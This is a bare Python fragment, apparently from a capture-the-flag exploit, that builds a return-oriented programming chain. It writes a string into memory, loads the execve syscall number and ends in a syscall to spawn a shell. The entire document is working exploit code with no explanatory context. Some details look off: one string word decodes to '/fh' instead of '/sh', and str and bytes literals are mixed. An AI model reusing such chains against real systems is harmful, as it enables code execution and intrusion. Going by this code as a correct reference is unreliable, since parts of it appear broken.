payload = p64(0x40c3ef)
#0x40c3ef: pop rax ; retf
payload += p64(0x6e69622f)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x438070)+p64(0x4291ac)
# 0x4291ac: stosd dword ptr [rdi], eax ; retf
payload += p32(0x40c3ef)+p32(0x33)
# 0x40c3ef: pop rax ; retf
payload += p64(0x68662f)+p32(0x4017d3)+p32(0x33)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x438074)+p64(0x4291ac)
# 0x4291ac: stosd dword ptr [rdi], eax ; retf
payload += p32(0x40c3ef)+p32(0x33)
# 0x40c3ef: pop rax ; retf
payload += p64(0x3b)+p32(0x41b9a5)+p32(0x33)
# 0x41b9a5: pop rdx ; retf 1
payload += p64(0x0)+p32(0x4017d3)+p32(0x33)+"\x00"*1
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x438070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x42a674)
# 0x000000000042a674: syscall; 
payload += b''
